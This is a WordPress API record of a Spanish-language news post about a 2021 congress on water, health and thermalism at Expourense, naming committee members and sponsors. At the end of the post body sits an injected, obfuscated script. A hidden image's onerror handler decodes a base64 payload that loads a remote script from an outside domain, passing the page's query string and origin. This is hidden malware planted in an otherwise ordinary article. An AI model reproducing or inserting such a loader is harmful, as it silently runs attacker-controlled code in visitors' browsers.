{"id":4630,"date":"2021-08-31T21:33:19","date_gmt":"2021-09-01T00:33:19","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4630"},"modified":"2025-08-13T16:28:48","modified_gmt":"2025-08-13T19:28:48","slug":"todo-preparado-para-el-2o-congreso-internacional-sobre-agua-y-salud-y-para-el-4o-simposio-internacional-sobre-termalismo-y-calidad-de-vida","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4630","title":{"rendered":"Todo preparado para el 2\u00ba Congreso Internacional sobre Agua y Salud y para el 4\u00ba Simposio Internacional sobre Termalismo y Calidad de Vida"},"content":{"rendered":"\n<p><strong>&gt;&gt; Hoy tuvo lugar la \u00faltima reuni\u00f3n del comit\u00e9 que organiza ambos eventos internacionales que se celebrar\u00e1n en Expourense entre el 15 y el 17 de septiembre en formato h\u00edbrido<\/strong><\/p>\n\n\n\n<p><strong>&gt;&gt; El objetivo de esta reuni\u00f3n fue presentar el programa cient\u00edfico que cuenta con la participaci\u00f3n de medio centenar de ponentes de 10 pa\u00edses y animar a los profesionales del sector de todo el Mundo a inscribirse en \u00e9l<\/strong><\/p>\n\n\n\n<div class=\"wp-block-image\"><figure class=\"aligncenter size-large\"><a href=\"https:\/\/congreso.termatalia.com\/\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" width=\"728\" height=\"90\" src=\"https:\/\/argentinatermal.com.ar\/wp-content\/uploads\/2021\/08\/728x90.gif\" alt=\"\" class=\"wp-image-4624\" \/><\/a><figcaption><span style=\"color:#0693e3\" class=\"tadv-color\">Publicidad<\/span><\/figcaption><\/figure><\/div>\n\n\n\n<p>Programa cient\u00edfico completo y abierto el plazo de inscripciones para asistir. Este es el momento en el que se encuentran el 2\u00ba Congreso Internacional sobre Agua y Salud promovido por Termatalia y el 4\u00ba Simposio Internacional sobre Termalismo y Calidad de Vida organizado por el Campus da Auga da Universidade de Vigo que se celebrar\u00e1n de forma conjunta en Expourense entre el 15 y el 17 de septiembre de 2021. Tendr\u00e1n un formato virtual por lo que podr\u00e1n seguirse de forma f\u00edsica desde el recinto ferial ourensano o virtualmente desde cualquier parte del Mundo.<\/p>\n\n\n\n<p>Esta ma\u00f1ana se celebraba en formato virtual la \u00faltima reuni\u00f3n del comit\u00e9 organizador de estos congresos en los que fue presentado el programa cient\u00edfico final que contar\u00e1 con la participaci\u00f3n de medio centenar de expertos procedentes de 10 pa\u00edses. El director de Termatalia, Rogelio Mart\u00ednez, solicit\u00f3 la colaboraci\u00f3n en la difusi\u00f3n del programa entre alumnos universitarios y profesionales asociados a las distintas entidades que componen este comit\u00e9. La participaci\u00f3n virtual internacional est\u00e1 garantizada por el n\u00famero de inscripciones que se est\u00e1n recibiendo, por lo que el director anim\u00f3 a participar de forma presencial a los profesionales de Galicia y Portugal, ya que Expourense ha puesto en marcha un protocolo sanitario que garantiza la higiene, la seguridad y la distancia entre los asistentes.<\/p>\n\n\n\n<p>Este congreso tiene el objetivo de reunir a la comunidad termal internacional en torno a la marca Termatalia y seguir siendo posicionando a Ourense y a Galicia como centro de capacitaci\u00f3n profesional internacional en materia de termalismo. Termatalia es una cita que re\u00fane en cada edici\u00f3n a profesionales de m\u00e1s de 30 pa\u00edses y desde Expourense se ha decidido el aplazamiento de la feria como tal hasta septiembre de 2022 para poder garantizar entonces la presencia masiva de profesionales aprovechando adem\u00e1s la celebraci\u00f3n del doble A\u00f1o Santo Xacobeo para atraer turistas a Galicia, ya que el programa social de la feria incluye visitas a distintos puntos de inter\u00e9s de esta comunidad.<\/p>\n\n\n\n<p>Esta reuni\u00f3n estuvo dirigida por el nuevo director gerente de Expourense y director de Termatalia, Rogelio Mart\u00ednez, y cont\u00f3 con la asistencia de 25 expertos de Espa\u00f1a y Portugal. Participaron en esta reuni\u00f3n el presidente de la Sociedad Espa\u00f1ola de Hidrolog\u00eda M\u00e9dica, Dr. Francisco Maraver; el presidente de la Asoaci\u00f3n Espa\u00f1ola de Asociaci\u00f3n Espa\u00f1ola de Wellness Spa, Alfredo P\u00e9rez; la gerente del INORDE, Emma Gonz\u00e1lez; del jefe de \u00e1rea de Turismo de la Xunta de Galicia en Ourense, Cecilio Santalices; la t\u00e9cnico de Turismo del Ayuntamiento de Ourense, Nita Torres; el director general del Instituto de Calidad Tur\u00edstica Espa\u00f1ola, Fernando Fraile; el gerente del Cl\u00faster del Agua Mineral y Termal de Galicia, Benigno Amor; la presidenta de la Sociedad Gallega de Talasoterapia, Lourdes Mourelle; la t\u00e9cnico de Turismo de Porto e Norte de Portugal, Cristina Mendes; el gerente del Grupo Caldaria, Javier Soto; el representante de la Asociaci\u00f3n Iberoamericana de Termalismo y Bienestar, Antonio Freire; el representante de Peloides Termales, Jos\u00e9 Luis Legido; el director de la C\u00e1tedra de Hidrolog\u00eda M\u00e9dica de la Universidad de Santiago de Compostela, Juan Gestal; la profesora titular del \u00c1rea de Termalismo del Campus de Ourense, Ana Torrado; el director del Master Universitario en Direcci\u00f3n y Planificaci\u00f3n del Turismo Interior y de salud de la Universidad de Vigo, Jos\u00e9 Antonio Fraiz; el presidente de la Mancomunidad Tur\u00edstica Terras do Avia y Senador en la Comisi\u00f3n de Sanidad, Francisco Jos\u00e9 Fern\u00e1ndez; el director de la Eurocidade Chaves \u2013 Ver\u00edn, Pablo Rivera; la Investigadora Marita Souto; el coordinador de Termas Centro de Portugal, Adriano Barreto, y la directora de Administraci\u00f3n de Expourense, Cristina \u00c1lvarez.<\/p>\n\n\n\n<p>La reuni\u00f3n del comit\u00e9 de Termatalia tuvo lugar esta ma\u00f1ana, precisamente en el d\u00eda en el que Bolet\u00edn Oficial del Estado publicaba la resoluci\u00f3n por la que son convocadas las plazas para pensionistas que deseen participar en el Programa de Termalismo, un total de 57.565 plazas para distribuir en los distintos balnearios de Espa\u00f1a. Una noticia muy esperada por los empresarios \u201cque llev\u00e1bamos esperando mucho tiempo y que nos permiten hablar de la supervivencia del sector termal\u201d, indic\u00f3 Javier Soto, gerente del Grupo Caldaria. Durante esta reuni\u00f3n tambi\u00e9n se mencion\u00f3 la ya vieja reivindicaci\u00f3n de los profesionales del sector balneario de que los tratamientos termales sean incluidos en la cartera de servicios de la Seguridad Social Espa\u00f1ola al igual que sucede en otros pa\u00edses de Europa.<\/p>\n\n\n\n<p>Los miembros de este comit\u00e9 mostraron su total apoyo, su compromiso en la difusi\u00f3n y su satisfacci\u00f3n por la puesta en marcha de acciones que vuelvan a reunir a los profesionales del sector en torno a Termatalia que se reafirma as\u00ed una vez m\u00e1s como ejemplo de cooperaci\u00f3n p\u00fablico-privada local, nacional e internacional para trabajar por el desarrollo del termalismo a nivel mundial. Este Congreso tiene el apoyo de la Agencia de Turismo de Galicia, de la Diputaci\u00f3n provincial de Ourense y de la Concejal\u00eda de Turismo y termalismo del Ayuntamiento de Ourense. Adem\u00e1s, cuenta con la colaboraci\u00f3n del Instituto Nacional de Promoci\u00f3n Tur\u00edstica de Argentina (INPROTUR), del GRD-12 Carballi\u00f1o- Ribeiro, de Turismo de Extremadura, de Turismo de la Regi\u00f3n de Murcia \u2013 Costa C\u00e1lida, de la C\u00e1tedra de Hidrolog\u00eda M\u00e9dica de la Universidad de Santiago de Compostela y de RENFE.<\/p>\n\n\n\n<p>Este Congreso se celebrar\u00e1 de forma paralela y complementaria a otras acciones profesionales de Termatalia como el Workshop especializado en Turismo de Bienestar, el seminario de especializaci\u00f3n en aguas minerales o la 18\u00aa Cata Internacional de Aguas.<\/p>\n\n\n\n<p>El programa del Congreso puede consultarse en&nbsp;<a href=\"https:\/\/congreso.termatalia.com\/programa\">https:\/\/congreso.termatalia.com\/programa<\/a><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>&gt;&gt; Hoy tuvo lugar la \u00faltima reuni\u00f3n del comit\u00e9 que organiza ambos eventos internacionales que se celebrar\u00e1n en Expourense entre el 15 y el 17 de septiembre en formato h\u00edbrido &gt;&gt; El objetivo de esta reuni\u00f3n fue presentar el programa cient\u00edfico que cuenta con la participaci\u00f3n de medio centenar de ponentes de 10 pa\u00edses y [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4631,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[16,15,14],"tags":[],"class_list":["post-4630","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-medicina-termal","category-turismo-de-bienestar","category-turismo-salud"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4630","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4630"}],"version-history":[{"count":2,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4630\/revisions"}],"predecessor-version":[{"id":10790,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4630\/revisions\/10790"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4631"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4630"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4630"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4630"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}